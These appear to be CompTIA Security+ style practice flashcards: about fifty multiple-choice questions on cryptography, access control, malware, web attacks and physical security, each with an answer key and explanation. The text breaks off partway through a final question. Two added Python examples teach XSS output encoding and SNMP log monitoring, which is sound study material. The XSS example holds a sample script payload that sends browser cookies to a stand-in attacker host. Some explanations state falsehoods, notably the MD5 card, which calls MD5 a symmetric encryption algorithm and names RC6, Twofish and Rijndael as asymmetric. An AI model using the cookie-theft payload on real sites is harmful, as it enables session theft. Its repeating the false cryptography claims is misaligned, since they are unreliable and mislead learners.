Test #2 Flashcards

1
Q

An organization is looking for a filtering solution that will help eliminate some of the recent problems it has had with viruses and worms. Which of the following best meets this requirement?

❍ A. Intrusion detection
❍ B. Malware inspection
❍ C. Load balancing
❍ D. Internet content filtering

A

Answer B is correct. A malware inspection filter is basically a web filter
applied to traffic that uses the HTTP protocol. The body of all HTTP
requests and responses is inspected. Malicious content is blocked while legitimate
content passes through unaltered. Answer A is incorrect because
intrusion-detection systems are designed to analyze data, identify attacks, and
respond to the intrusion. Answer C is incorrect because load balancers are
servers configured in a cluster to provide scalability and high availability.
Answer D is incorrect because Internet content filters use a collection of
terms, words, and phrases that are compared to content from browsers and
applications.

2
Q
Which risk management response is being implemented when a company purchases insurance to protect against service outage?

❍ A. Acceptance
❍ B. Avoidance
❍ C. Mitigation
❍ D. Transference

A

Answer D is correct. The liability of risk is transferred through insurance
policies. Answer A is incorrect because accepting a risk is to do nothing in
response. Risk avoidance involves simply terminating the operation that produces
the risk, making answer B incorrect. Answer C is not correct because
mitigation applies a solution that results in a reduced level of risk or exposure.

3
Q
A collection of compromised computers running software installed by a Trojan horse or a worm is referred to as what?

❍ A. Zombie
❍ B. Botnet
❍ C. Herder
❍ D. Virus

A

Answer B is correct. Answers A and C are incorrect but are related to a botnet
in that a zombie is one of many computer systems that make up a botnet,
whereas a bot herder is the controller of the botnet. Answer D is incorrect. A
virus is a program that infects a computer without the knowledge of the user.

4
Q
Adding a token for every POST or GET request that is initiated from the browser to the server can be used to mitigate which of the following attacks?

❍ A. Buffer overflow
❍ B. Cross-site request forgery (XSRF)
❍ C. Cross-site scripting
❍ D. Input validation error

A

Answer B is correct. In order to mitigate cross-site request forgery (XSRF)
attacks, the most common solution is to add a token for every POST or GET
request that is initiated from the browser to the server. Answer A is incorrect
because buffer overflows are associated with input validation. Answer C is
incorrect because setting the HTTPOnly flag on the session cookie is used to
mitigate XSS attacks. Answer D is incorrect because input validation tests
whether an application properly handles input from a source outside the
application destined for internal processing.

5
Q
Which of the following is one of the biggest challenges associated with database encryption?

❍ A. Multi-tenancy
❍ B. Key management
❍ C. Weak authentication components
❍ D. Platform support

A

Answer B is correct. One of the biggest challenges associated with database
encryption is key management. Answer A is incorrect because multi-tenancy is
a security issue related to cloud computing implementations. Answer C is
incorrect because lack of management software and weak authentication components
are associated with hardware hard drive encryption. Answer D is
incorrect because cost and platform support are concerns with smartphone
encryption products.

6
Q
Which form of access control enables data owners to extend access rights to other logons?

❍ A. MAC
❍ B. DAC
❍ C. Role-based (RBAC)
❍ D. Rule-based (RBAC)

A

Answer B is correct. Discretionary access control (DAC) systems enable data
owners to extend access rights to other logons. Mandatory access control
(MAC) systems require assignment of labels to extend access, making answer
A incorrect. Answers C and D are incorrect because both RBAC access control
forms rely on conditional assignment of access rules either inherited
(role-based) or by environmental factors such as time of day or secured terminal
location (rule-based).

7
Q
In a decentralized key management system, the user is responsible for which one of the following functions?

❍ A. Creation of the private and public key
❍ B. Creation of the digital certificate
❍ C. Creation of the CRL
❍ D. Revocation of the digital certificate

A

Answer A is correct. In a decentralized key system, the end user generates his
or her own key pair. The other functions, such as creation of the certificate,
CRL, and the revocation of the certificate, are still handled by the certificate
authority; therefore, answers B, C, and D are incorrect.

8
Q
What is the name given to the system of digital certificates and certificate authorities used for public key cryptography over networks?

❍ A. Protocol Key Instructions (PKI)
❍ B. Public Key Extranet (PKE)
❍ C. Protocol Key Infrastructure (PKI)
❍ D. Public Key Infrastructure (PKI)

A

Answer D is correct. Public Key Infrastructure describes the trust hierarchy
system for implementing a secure public key cryptography system over
TCP/IP networks. Answers A, B, and C are incorrect because these are bogus
terms.

9
Q
If Sally wants to send a secure message to Mark using public-key encryption but is not worried about sender verification, what does she need in addition to her original message text?

❍ A. Sally’s private key
❍ B. Sally’s public key
❍ C. Mark’s private key
❍ D. Mark’s public key

A

Answer D is correct. Sally needs Mark’s public key to encrypt her original
message in a form that only Mark can decrypt. Neither of Sally’s keys is needed
because the originator does not need to be validated, making answers A
and B incorrect. Answer C is incorrect because Mark’s private key is used for
decrypting the encrypted message to reveal Sally’s original message.

10
Q
Which of the following methods would be the most effective method to physically secure laptops that are used in an environment such as an office?

❍ A. Security cables
❍ B. Server cages
❍ C. Locked cabinet
❍ D. Hardware locks

A

Answer A is correct. Security cables with combination locks can provide such
security and are easy to use. They are used mostly to secure laptops and leave
the equipment exposed. Answer B is incorrect because PC Safe tower and
server cages are designed to bolt to the floor and are meant to be in an environment
that is static. Answer C is incorrect because a locked cabinet is an
alternative for equipment that is not used or does not have to be physically
accessed on a regular, daily basis. Vendors provide solutions such as a security
cabinet locker that secures CPU towers. The housing is made of durable,
heavy-duty steel for strength. Answer D is incorrect because a hardware lock
is used for license enforcement.

11
Q
Which of the following serves the purpose of trying to lure a malicious attacker into a system?

❍ A. Honeypot
❍ B. Pot of gold
❍ C. DMZ
❍ D. Bear trap

A

Answer A is correct. A honeypot is used to serve as a decoy and lure a malicious
attacker. Answers B and D are incorrect answers and are not legitimate
terms for testing purposes. Answer C is incorrect because a DMZ is an area
between the Internet and the internal network.

12
Q
What is the recommended range of humidity level according to the ASHRAE?

❍ A. 10%–20%
❍ B. 30%–40%
❍ C. 40%–55%
❍ D. 55%–65%

A

Answer C is correct. The American Society of Heating, Refrigerating and Air-
Conditioning Engineers (ASHRAE) recommends optimal humidity levels in the
40% to 55% range, making answers A, B, and D incorrect. Very low levels of
humidity can promote the buildup of electrostatic charges that can harm sensitive
electronic components. Very high levels of humidity can promote condensation
on chilled surfaces and introduce liquid into operating equipment.

13
Q
Which of the following is a network protocol that supports file transfers and is a combination of RCP and SSH?

❍ A. HTTPS
❍ B. FTPS
❍ C. SFTP
❍ D. SCP

A

Answer D is correct. The Secure Copy Protocol (SCP) is a network protocol
that supports file transfers. SCP is a combination of RCP and SSH. It uses the
BSD RCP protocol tunneled through the Secure Shell (SSH) protocol to provide
encryption and authentication. Answer A is incorrect because HTTPS is
used for secured web-based communications. Answer B is incorrect. FTPS,
also known as FTP Secure and FTP-SSL, is an FTP extension that adds support
for TLS and SSL. Answer C is incorrect because SFTP, or secure FTP, is
a program that uses SSH to transfer files. Unlike standard FTP, it encrypts
both commands and data, preventing passwords and sensitive information
from being transmitted in the clear over the network.

14
Q
You want to implement a technology solution for a small organization that can function as a single point of policy control and management for access to Internet content. Which of the following should you choose?

❍ A. Proxy gateway
❍ B. Circuit-level gateway
❍ C. Application-level gateway
❍ D. Web security gateway

A

Answer D is correct. Web security gateways offer a single point of policy control
and management for web-based content access. Answer A is too generic to
be a proper answer. Answer B is incorrect because a circuit-level gateway’s decisions
are based on source and destination addresses. Answer C is incorrect
because an application-level gateway understands services and protocols.

15
Q

You have recently had security breaches in the network. You suspect they might be coming from a telecommuter’s home network. Which of the following devices would you use to require a secure method for employees to access corporate
resources while working from home?

❍ A. A router
❍ B. A VPN concentrator
❍ C. A firewall
❍ D. A network-based IDS

A

Answer B is correct. A VPN concentrator is used to allow multiple users to
access network resources using secure features that are built into the device and
are deployed where the requirement is for a single device to handle a very large
number of VPN tunnels. Answer A is incorrect because a router forwards information
to its destination on the network or the Internet. A firewall protects computers
and networks from undesired access by the outside world; therefore,
answer C is incorrect. Answer D is incorrect because network-based intrusion-detection
systems monitor the packet flow and try to locate packets that are not
allowed for one reason or another and might have gotten through the firewall.

16
Q

At which layer of the OSI model does the Internet Protocol Security protocol function?

❍ A. Network layer
❍ B. Presentation layer
❍ C. Session layer
❍ D. Application layer

A

Answer A is correct. IPsec validation and encryption function at the network
layer of the OSI model. Answers B, C, and D are incorrect because IPsec functions
at a lower level of the OSI model.

17
Q
When troubleshooting SSL, which two layers of the OSI model are of most value?

❍ A. Application layer and Presentation layer
❍ B. Presentation layer and Session layer
❍ C. Application layer and Transport layer
❍ D. Physical layer and Data Link layer

A

Answer C is correct. SSL connections occur between the application and transport
layers. Answer A is incorrect because the Secure Sockets Layer (SSL) operates
at a deeper level. Answer B is incorrect because the Secure Sockets Layer transport
effectively fills the same role as these OSI model layers. Answer D is incorrect
because the data has been abstracted beyond the level at which SSL operates.

18
Q
Which of the three principles of security is supported by an iris biometric system?

❍ A. Confidentiality
❍ B. Integrity
❍ C. Availability
❍ D. Vulnerability

A

Answer A is correct. Confidentiality involves protecting against unauthorized
access, which biometric authentication systems support. Integrity is concerned
with preventing unauthorized modification, making answer B incorrect. Answer
C is not correct because availability is concerned with ensuring that access to
services and data is protected against disruption. Answer D is incorrect because
a vulnerability is a failure in one or more of the C-I-A principles.

19
Q
_________ describes the potential that a weakness in hardware, software, process, or people will be identified and taken advantage of.

❍ A. Vulnerability
❍ B. Exploit
❍ C. Threat
❍ D. Risk

A

Answer C is correct. A threat is the potential that a vulnerability will be identified
and exploited. Answer A is incorrect because a vulnerability is the weakness
itself and not the likelihood that it will be identified and exploited.
Answer B is incorrect because an exploit is the mechanism of taking advantage
of a vulnerability rather than its likelihood of occurrence. Answer D is incorrect
because risk is the likelihood that a threat will occur and the measure of
its effect.

20
Q
Which of the following is not a principal concern for first responders to a hacking incident within a corporation operating in the United States?

❍ A. Whether EMI shielding is intact
❍ B. Whether data is gathered properly
❍ C. Whether data is protected from modification
❍ D. Whether collected data is complete

A

Answer A is correct. EMI shielding is important to protecting data and services
against unauthorized interception as well as interference but is not a principal
concern for first responders following an incident. First responders must
ensure that data is collected correctly and protect it from modification using
proper controls, ensuring a clear chain of evidence, making answers B and C
incorrect. Answer D is incorrect because a first responder might be the only
agent able to ensure that all data is collected before being lost due to volatility
of storage.

21
Q
Which rule of evidence within the United States involves Fourth Amendment protections?

❍ A. Admissible
❍ B. Complete
❍ C. Reliable
❍ D. Believable

A

Answer A is correct. Admissibility involves collecting data in a manner that
ensures its viability in court, including legal requirements such as the Fourth
Amendment protections against unlawful search and seizure. Answers B and C
are incorrect because data must be collected completely and protected against
modification to ensure reliability, but these are not concerns of the Fourth
Amendment. Answer D is incorrect because believability focuses on evidence
being understandable, documented, and not subject to modification during
transition.

22
Q
A user has downloaded trial software and subsequently downloads a key generator in order to unlock the trial software. The user’s antivirus detection software now alerts the user that the system is infected. Which one of the following best describes the type of malware infecting the system?

❍ A. Logic bomb
❍ B. Trojan
❍ C. Adware
❍ D. Worm

A

Answer B is correct. Trojans are programs disguised as something useful. In
this instance, the user was likely illegally trying to crack software, and in the
process infect the system with malware. Although answers A, C, and D are
types of malware, they are not the best choices.

23
Q
Which of the following is a coordinated effort in which multiple machines attack a single victim or host with the intent to prevent legitimate service?

❍ A. DoS
❍ B. Masquerading
❍ C. DDoS
❍ D. Trojan horse

A

Answer C is correct. A distributed denial of service (DDoS) is similar to a
denial-of-service (DoS) attack in that they both try to prevent legitimate
access to services. However, a DDoS is a coordinated effort among many
computer systems; therefore, answer A is incorrect. Masquerading involves
using someone else’s identity to access resources; therefore, answer B is incorrect.
A Trojan horse is a program used to perform hidden functions; therefore,
answer D is incorrect.

24
Q
What is the name given to the activity that consists of collecting information that will be later used for monitoring and review purposes?

❍ A. Logging
❍ B. Auditing
❍ C. Inspecting
❍ D. Vetting

A

Answer A is correct. Logging is the process of collecting data to be used for
monitoring and auditing purposes. Auditing is the process of verification that
normally involves going through log files; therefore, answer B is incorrect.
Typically, the log files are frequently inspected, and inspection is not the
process of collecting the data; therefore, answer C is incorrect. Vetting is the
process of thorough examination or evaluation; therefore, answer D is incorrect.

25
Q
Which of the following are not methods for minimizing a threat to a web server? (Choose the two best answers.)

❍ A. Disable all non-web services
❍ B. Ensure Telnet is running
❍ C. Disable nonessential services
❍ D. Enable logging

A

Answers B and D are correct. Having Telnet enabled presents security issues
and is not a primary method for minimizing threat. Logging is important for
secure operations and is invaluable when recovering from a security incident.
However, it is not a primary method for reducing threat. Answer A is incorrect
because disabling all non-web services might provide a secure solution for
minimizing threats. Answer C is incorrect because each network service carries
its own risks; therefore, it is important to disable all nonessential services.

26
Q
The organization is concerned about bugs in commercial off-the-shelf (COTS) software. Which of the following might be the only means of reviewing the security quality of the program?

❍ A. Fuzzing
❍ B. Cross-site scripting
❍ C. Input validation
❍ D. Cross-site request forgery

A

Answer A is correct. In some closed application instances, fuzzing might be
the only means of reviewing the security quality of the program. Answer B is
incorrect because cross-site scripting (XSS) vulnerabilities can be used to
hijack the user’s session or to cause the user accessing malware-tainted Site A
to unknowingly attack Site B on behalf of the attacker who planted code on
Site A. Answer C is incorrect because input validation tests whether an application
properly handles input from a source outside the application destined
for internal processing. Answer D, Cross-site Request Forgery (XSRF), is an
attack in which the end user executes unwanted actions on a web application
while she is currently authenticated.

27
Q
Which of the following is an attack in which the end user executes unwanted actions on a web application while he is currently authenticated?

❍ A. Buffer overflow
❍ B. Input validation error
❍ C. Cross-site scripting
❍ D. Cross-site request forgery

A

Answer D is correct. Cross-site Request Forgery (XSRF) is an attack in which
the end user executes unwanted actions on a web application while he is currently
authenticated. Answer A is incorrect because a buffer overflow is a
direct result of poor or incorrect input validation or mishandled exceptions.
Answer B is incorrect because input validation errors are a result of improper
field checking in the code. Answer C is incorrect because cross-site scripting
(XSS) vulnerabilities can be used to hijack the user’s session or to cause the
user accessing malware-tainted Site A to unknowingly attack Site B on behalf
of the attacker who planted code on Site A.

28
Q
Which of the following methods would be the most effective method to physically secure computers that are used in a lab environment that operates on a part-time basis?

❍ A. Security cables
❍ B. Server cages
❍ C. Locked cabinet
❍ D. Hardware locks

A

Answer C is correct. A locked cabinet is an alternative for equipment that is not
used or does not have to be physically accessed on a regular, daily basis. Vendors
provide solutions such as a security cabinet locker that secures CPU towers. The
housing is made of durable, heavy-duty steel for strength. Answer A is incorrect
because security cables with combination locks can provide such security and are
easy to use but are used mostly to secure laptops and leave the equipment
exposed. Answer B is incorrect because PC Safe tower and server cages are
designed to bolt to the floor and are meant to be in an environment that is static.
Answer D is incorrect because a hardware lock is used for license enforcement.

29
Q
Which of the following methods would be the most effective to physically secure tower-style computers in a financial organization?

❍ A. Security cables
❍ B. Server cages
❍ C. Locked cabinet
❍ D. Hardware locks

A

Answer B is correct. Products such as PC Safe tower and server cages are
designed to bolt to the floor and are meant to be in an environment that is
static. For example, financial businesses have been hit hard by theft of desktop
computers because they hold a lot of personal data. Answer A is incorrect
because security cables with combination locks can provide such security and
are easy to use and are used mostly to secure laptops and leave the equipment
exposed. Answer C is incorrect because a locked cabinet is an alternative for
equipment that is not used or does not have to be physically accessed on a
regular, daily basis. Answer D is incorrect because a hardware lock, also
known as a software protection dongle, is used for license enforcement.

30
Q
Your organization is exploring data loss prevention solutions. The proposed solution is an end-point solution. This solution is targeting which of the following data states?

❍ A. In motion
❍ B. At rest
❍ C. In use
❍ D. At flux

A

Answer C is correct. Protection of data in use is considered to be an endpoint
solution and the application is run on end-user workstations or servers in the
organization. Answer A is incorrect because protection of data in motion is considered to be a network solution and either a hardware or software solution
is installed near the network perimeter to monitor for and flag policy violations.
Answer B is incorrect because protection of data at rest is considered to be a
storage solution and is generally a software solution that monitors how confidential
data is stored. Answer D is incorrect because there is no such data state.

31
Q
Which of the following uses a secure crypto-processor to authenticate hardware devices such as PC or laptop?

❍ A. Public Key Infrastructure
❍ B. Full disk encryption
❍ C. File-level encryption
❍ D. Trusted Platform Module

A

Answer D is correct. TPM refers to a secure crypto-processor used to authenticate
hardware devices such as PC or laptop. The idea behind TPM is to allow
any encryption-enabled application to take advantage of the chip. Answer A is
incorrect because Public Key Infrastructure (PKI) is a set of hardware, software,
people, policies, and procedures needed to create, manage, distribute,
use, store, and revoke digital certificates. Answer B is incorrect because full-disk
encryption involves encrypting the operating system partition on a computer
and then booting and running with the system drive encrypted at all
times. Answer C is incorrect because in file- or folder-level encryption, individual
files or directories are encrypted by the file system itself.

32
Q
Which process involves verifying keys as being authentic?

❍ A. Authorization
❍ B. Authentication
❍ C. Access control
❍ D. Verification

A

Answer B is correct. Authentication involves the presentation and verification
of credentials of keys as being authentic. Answer A is incorrect because
authorization involves checking authenticated credentials against a list of
authorized security principles. Once checked, resource access is allowed or
limited based on Access Control constraints, making answer C incorrect.
Answer D is incorrect because verification of credentials occurs during
authentication (as being authentic) and authorization (as being authorized to
request resource access) and is not a recognized access control process.

33
Q
Which category of authentication includes smart cards?

❍ A. Something you know
❍ B. Something you have
❍ C. Something you are
❍ D. Something you do

A

Answer B is correct. Something you have includes smart cards, tokens, and
keys. Something you know includes account logons, passwords, and PINs,
making answer A incorrect. Answers C and D are incorrect because both
something you are and something you do involve measures of personal biological
qualities and do not require an external device such as a smart card or key.

34
Q
Which of the following is not a division of access control as defined by the Orange Book?

❍ A. Discretionary
❍ B. Limited
❍ C. Mandatory
❍ D. Verified

A

Answer B is correct. “Limited” is not an access control designation within the
Trusted Computer System Evaluation Criteria (TCSEC) document DoD 5200.28-STD,
often referred to as the “Orange Book.” The four divisions are Mandatory,
Discretionary, Minimal, and Verified, making answers A, C, and D incorrect.

35
Q
Which division of TCSEC access control includes the subdivisions Controlled Access Protection and Discretionary Security Protection?

❍ A. Division A
❍ B. Division B
❍ C. Division C
❍ D. Division D

A

Answer C is correct. Discretionary access control (C-level) includes subdivisions
Discretionary Security Protection (C1) and Controlled Access
Protection (C2) based on details such as data segmentation and logging.
These are not subdivisions of the Minimal (D-level), Mandatory (B-level), or
Verified (A-level) access control divisions, making answers A, B, and D
incorrect.

36
Q
Which of the following is a hybrid crypto system?

❍ A. IDEA
❍ B. MD5
❍ C. RSA
❍ D. PGP

A

Answer D is correct. Pretty Good Privacy (PGP) is a hybrid cryptosystem that
makes use of the incorrect choices, A, B, and C. IDEA is a symmetric encryption
cipher, RSA is an asymmetric cipher, and MD5 is a hash.

37
Q
Which of the following is the type of algorithm used by MD5?

❍ A. Block cipher algorithm
❍ B. Hashing algorithm
❍ C. Asymmetric encryption algorithm
❍ D. Cryptographic algorithm

A

Answer B is correct. Although the Message Digest (MD) series of algorithms
is classified globally as a symmetric key encryption algorithm, the correct
answer is hashing algorithm, which is the method that the algorithm uses to
encrypt data. Answer A is incorrect because a block cipher divides the message
into blocks of bits. Answer C is incorrect because MD5 is a symmetric
key algorithm, not an asymmetric encryption algorithm (examples of this
include RC6, Twofish, and Rijndael). Answer D is incorrect because cryptographic
algorithm is a bogus term.

38
Q
To check the validity of a digital certificate, which one of the following would be used?

❍ A. Corporate security policy
❍ B. Certificate policy
❍ C. Certificate revocation list
❍ D. Expired domain names

A

Answer C is correct. A certificate revocation list (CRL) provides a detailed list
of certificates that are no longer valid. A corporate security policy would not
provide current information on the validity of issued certificates; therefore,
answer A is incorrect. A certificate policy does not provide information on
invalid issued certificates, either; therefore, answer B is incorrect. Finally, an
expired domain name has no bearing on the validity of a digital certificate;
therefore, answer D is incorrect.

39
Q
What is the acronym for the de facto cryptographic message standards developed by RSA Laboratories?

❍ A. PKIX
❍ B. X.509
❍ C. PKCS
❍ D. Both A and C

A

Answer C is correct. The Public Key Cryptography Standards (PKCS) are the
de facto cryptographic message standards developed and maintained by RSA
Laboratories, a division of the RSA Security Corporation. PKIX describes the
development of Internet standards for X.509-based digital certificates; therefore,
answers A, B, and D are incorrect.

40
Q
Which of the following is true of digital signatures? (Choose the two best answers.)

❍ A. They use the skipjack algorithm.
❍ B. They can be automatically time-stamped.
❍ C. They allow the sender to repudiate that the message was sent.
❍ D. They cannot be imitated by someone else.

A

Answers B and D are correct. Digital signatures offer several features and capabilities.
This includes being able to ensure the sender cannot repudiate that he
or she used the signature. In addition, non-repudiation schemes are capable of
offering time stamps for the digital signature. Answer A is incorrect. The
Skipjack algorithm was developed for use with a chipset developed by the U.S.
government. Skipjack provides only for encryption. Answer C is incorrect, as a
key feature of digital signatures is to provide for non-repudiation.

41
Q
What is the recommended best model of privilege management in a large extended enterprise?

❍ A. DACLs
❍ B. User-based
❍ C. SACLs
❍ D. Group-based

A

Answer D is correct. Group-based privilege management is generally the best
model for assignment of rights and denials in large extended enterprise environments,
as a user’s rights can be easily reviewed by examining its group
membership. Answer B is incorrect because user-based privilege management
requires significant overhead to provision and de-provision individual permissions
and can leave unauthorized access rights after personnel transfer between
organizational roles or locales. Answers A and C are incorrect because both
discretionary (DACLs) and system access control lists (SACLs) are produced as
the result of privilege assignment and not models of management.

42
Q
Which authorization protocol is generally compatible with TACACS?

❍ A. LDAP
❍ B. RADIUS
❍ C. TACACS+
❍ D. XTACACS

A

Answer D is correct. The Extended Terminal Access Controller Access
Control System (XTACACS) protocol is a proprietary form of the TACACS
protocol developed by Cisco and is compatible in many cases. Neither LDAP
nor RADIUS is affiliated with the TACACS protocol, making answers A and
B incorrect. Answer C is incorrect because the newer TACACS+ is not
backward-compatible with its legacy equivalent.

43
Q
  1. Your organization is exploring data loss prevention solutions. The proposed solution
    is a software storage solution that monitors how confidential data is stored. This solution is targeting which of the following data states?

❍ A. In motion
❍ B. At rest
❍ C. In use
❍ D. At flux

A

Answer B is correct. Protection of data at rest is considered to be a storage
solution and is generally a software solution that monitors how confidential
data is stored. Answer C is incorrect because protection of data in use is considered
to be an endpoint solution and the application is run on end-user
workstations or servers in the organization. Answer A is incorrect because
protection of data in motion is considered to be a network solution and either
a hardware or software solution is installed near the network perimeter to
monitor for and flag policy violations. Answer D is incorrect because there is
no such data state.

44
Q
  1. Which of the following is needed to establish effective security baselines for host
    systems? (Select two correct answers.)

❍ A. Cable locks
❍ B. Mandatory settings
❍ C. Standard application suites
❍ D. Decentralized administration

A

Answers B and C are correct. In order to establish effective security baselines,
enterprise network security management requires a measure of commonality
between the systems. Mandatory settings, standard application suites, and initial
setup configuration details all factor into the security stance of an enterprise
network. Answer A is incorrect because cable locks have nothing to do
with effective security baselines. Answer D is incorrect because decentralized
management does not have anything to do with security baselines.

45
Q
  1. Which of the following types of attacks is executed by placing malicious executable
    code on a website?

❍ A. Buffer overflow
❍ B. Cross-site request forgery (XSRF)
❍ C. Cross-site scripting (XSS)
❍ D. Input validation error

A

Answer C is correct. Cross-site scripting (XSS) vulnerabilities can be used to
hijack the user’s session or to cause the user accessing malware-tainted Site A
to unknowingly attack Site B on behalf of the attacker who planted code on
Site A. Answer A is incorrect because a buffer overflow is a direct result of
poor or incorrect input validation or mishandled exceptions. Answer B is
incorrect. The key element to understanding XSRF is that attackers are betting
that users have a validated login cookie for the website already stored in
their browsers. Answer D is incorrect because input validation errors are a
result of improper field checking in the code.
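
Added example (not from the original flashcards): the Site A / Site B scenario above comes down to untrusted text being written into HTML without encoding. The Python below renders one constructed attacker comment and one constructed attribute payload both unsafely and with contextual output encoding, then uses the standard-library HTML parser as a stand-in for the browser to show what would actually execute. The payloads, the function names and the attacker.example host are assumptions made for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs (assumptions for this example): a script injection
# aimed at element content and a quote-breaking payload aimed at an attribute.
SAMPLE_COMMENT = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
SAMPLE_NAME = '" onmouseover="alert(1)'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: untrusted text is concatenated straight into the HTML body."""
    return "<p>" + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    """Hardened: entity-encode before placing data in element content."""
    return "<p>" + html.escape(comment) + "</p>"


def render_attr_unsafe(name: str) -> str:
    """Vulnerable: the payload closes the quoted value and adds an event handler."""
    return '<input name="user" value="' + name + '">'


def render_attr_safe(name: str) -> str:
    """Hardened: attribute context needs quoting AND encoding of the quote character."""
    return '<input name="user" value="' + html.escape(name, quote=True) + '">'


class ActiveContentDetector(HTMLParser):
    """Stand-in for the browser: records what the parser would actually execute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):
                self.findings.append("event handler attribute " + attr_name)


def active_content(markup: str):
    """Return the executable constructs a parser finds in the rendered markup."""
    detector = ActiveContentDetector()
    detector.feed(markup)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    for label, markup in [
        ("comment, unsafe", render_comment_unsafe(SAMPLE_COMMENT)),
        ("comment, safe", render_comment_safe(SAMPLE_COMMENT)),
        ("attribute, unsafe", render_attr_unsafe(SAMPLE_NAME)),
        ("attribute, safe", render_attr_safe(SAMPLE_NAME)),
    ]:
        print(f"{label:18} -> {active_content(markup) or 'nothing executable'}")
```

The encoding has to match the context the data lands in: html.escape alone is enough for element content, but an unquoted or quote-breaking attribute still needs the surrounding quotes, and data placed inside a script block or a URL needs different encoding again.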

46
Q
  1. Which of the following are examples of protocol analyzers? (Select all correct answers.)

❍ A. Metasploit
❍ B. Wireshark
❍ C. SATAN
❍ D. Network Monitor

A

Answers B and D are correct. Windows Server operating systems come with a
protocol analyzer called Network Monitor. Third-party programs such as
Wireshark can also be used for network monitoring. Metasploit is a framework
used for penetration testing, and SATAN is a network security testing
tool; therefore, answers A and C are incorrect.

47
Q
  1. Which one of the following is not an example of a type of virus?

❍ A. Boot sector
❍ B. Macro
❍ C. Stealth
❍ D. Multiparisite

A

Answer D is correct. Answers A, B, and C each represent a different type of
virus. Multiparisite (as spelled in the question) is not a type of computer virus;
multipartite is, and it describes a hybrid that infects both boot sectors and
program files.

48
Q
  1. Which form of cabling is least susceptible to EM interference?

❍ A. STP
❍ B. UTP
❍ C. Co-axial
❍ D. Fiber-optic

A

Answer D is correct. Fiber-optic cabling is least subject to electromagnetic (EM)
interference because its communications are conducted by transmitting pulses of
light over glass, plastic, or sapphire transmission fibers. Twisted-pair (shielded
STP as well as unshielded UTP) copper cables provide minimal shielding against
interference but can function as antenna picking up nearby EM sources when
extended over long cable runs, making answers A and B incorrect. Answer C is
incorrect because, although co-axial cables limit EM interference by encasing
one conductor in a sheath of conductive material, they are still conductive and
not as resistant as purely optical forms of communication.

49
Q
  1. Which of the following is not a factor used in asset identification?

❍ A. Methods of access
❍ B. Original and replacement costs
❍ C. Maintenance costs
❍ D. Profit generated

A

Answer A is correct. Methods of access are identified during the risk and threat
assessment rather than during asset identification. Asset identification involves
original and replacement costs along with maintenance costs and profits generated
by the asset. Consequently, answers B, C, and D are incorrect.

50
Q
  1. It is suspected that some recent network compromises are originating from the
    use of SNMP. Which of the following UDP port traffic should be monitored?
    (Choose two correct answers.)

❍ A. 161
❍ B. 139
❍ C. 138
❍ D. 162

A

Answers A and D are correct. SNMP uses UDP port 161 (managers polling agents)
and UDP port 162 (agents sending traps to a manager). Answer B is incorrect
because port 139 is the NetBIOS session service, carried over TCP for Windows
file and printer sharing. Answer C is incorrect because port 138 is the NetBIOS
datagram service; NetBIOS name resolution uses port 137.
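
Added example (not from the original flashcards): monitoring the SNMP ports in practice means deciding which hosts may talk on them. The Python below parses a handful of constructed firewall-style flow records, labels each by the destination port (the SNMP, NetBIOS and FTP ports from these cards), and raises an alert when a poll to an agent on UDP/161 does not come from the sanctioned manager or a trap on UDP/162 goes to an unexpected collector. The log format, the addresses and the single allowed manager 10.0.1.5 are assumptions for the demonstration.

```python
import re
from collections import Counter

# Ports from the flashcards used to label traffic by destination port.
SERVICE_BY_PORT = {
    161: "snmp-agent", 162: "snmp-trap",
    137: "netbios-ns", 138: "netbios-dgm", 139: "netbios-ssn",
    20: "ftp-data", 21: "ftp-control",
}

# Assumption for this example: the only sanctioned SNMP manager / trap collector.
ALLOWED_SNMP_MANAGERS = {"10.0.1.5"}

LOG_LINE = re.compile(
    r"proto=(?P<proto>\w+) src=(?P<src>[\d.]+) sport=(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)"
)

# Constructed flow records in a generic firewall-log style (not real traffic).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z proto=udp src=10.0.1.5 sport=50210 dst=10.0.2.40 dport=161
2024-05-01T10:00:02Z proto=udp src=10.0.2.40 sport=161 dst=10.0.1.5 dport=50210
2024-05-01T10:00:05Z proto=udp src=10.0.7.77 sport=41000 dst=10.0.2.40 dport=161
2024-05-01T10:00:09Z proto=udp src=10.0.2.41 sport=33333 dst=203.0.113.9 dport=162
2024-05-01T10:00:12Z proto=udp src=10.0.3.10 sport=137 dst=10.0.3.255 dport=137
2024-05-01T10:00:15Z proto=tcp src=10.0.3.10 sport=49222 dst=10.0.3.20 dport=139
2024-05-01T10:00:20Z proto=udp src=10.0.2.41 sport=44444 dst=10.0.1.5 dport=162
"""


def parse_line(line: str):
    """Extract the 5-tuple fields, or None for lines that do not match."""
    match = LOG_LINE.search(line)
    if not match:
        return None
    fields = match.groupdict()
    return {
        "proto": fields["proto"], "src": fields["src"], "dst": fields["dst"],
        "sport": int(fields["sport"]), "dport": int(fields["dport"]),
    }


def snmp_alert(flow: dict):
    """Agents listen on 161, so the source of a poll should be a manager;
    managers collect traps on 162, so the destination of a trap should be one."""
    if flow["proto"] != "udp":
        return None
    if flow["dport"] == 161 and flow["src"] not in ALLOWED_SNMP_MANAGERS:
        return f"unauthorized SNMP poll from {flow['src']} to agent {flow['dst']}"
    if flow["dport"] == 162 and flow["dst"] not in ALLOWED_SNMP_MANAGERS:
        return f"SNMP trap from {flow['src']} to unexpected collector {flow['dst']}"
    return None


def analyse(log_text: str):
    """Return (alerts, per-service counts) for a block of log lines."""
    alerts = []
    counts = Counter()
    for line in log_text.splitlines():
        flow = parse_line(line)
        if flow is None:
            continue
        counts[SERVICE_BY_PORT.get(flow["dport"], "other")] += 1
        alert = snmp_alert(flow)
        if alert:
            alerts.append(alert)
    return alerts, counts


if __name__ == "__main__":
    found, summary = analyse(SAMPLE_LOG)
    print("traffic by destination service:", dict(summary))
    for alert in found:
        print("ALERT:", alert)
```

The NetBIOS and reply flows are counted but never alerted on, which is the point of keying the rule on direction and allowlist rather than on the port number alone.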

51
Q
  1. You are implementing network access for several internal business units that work with sensitive information on a small organizational network. Which of the following would best mitigate risk associated with users improperly accessing other segments of the network without adding additional switches?

❍ A. Log analysis
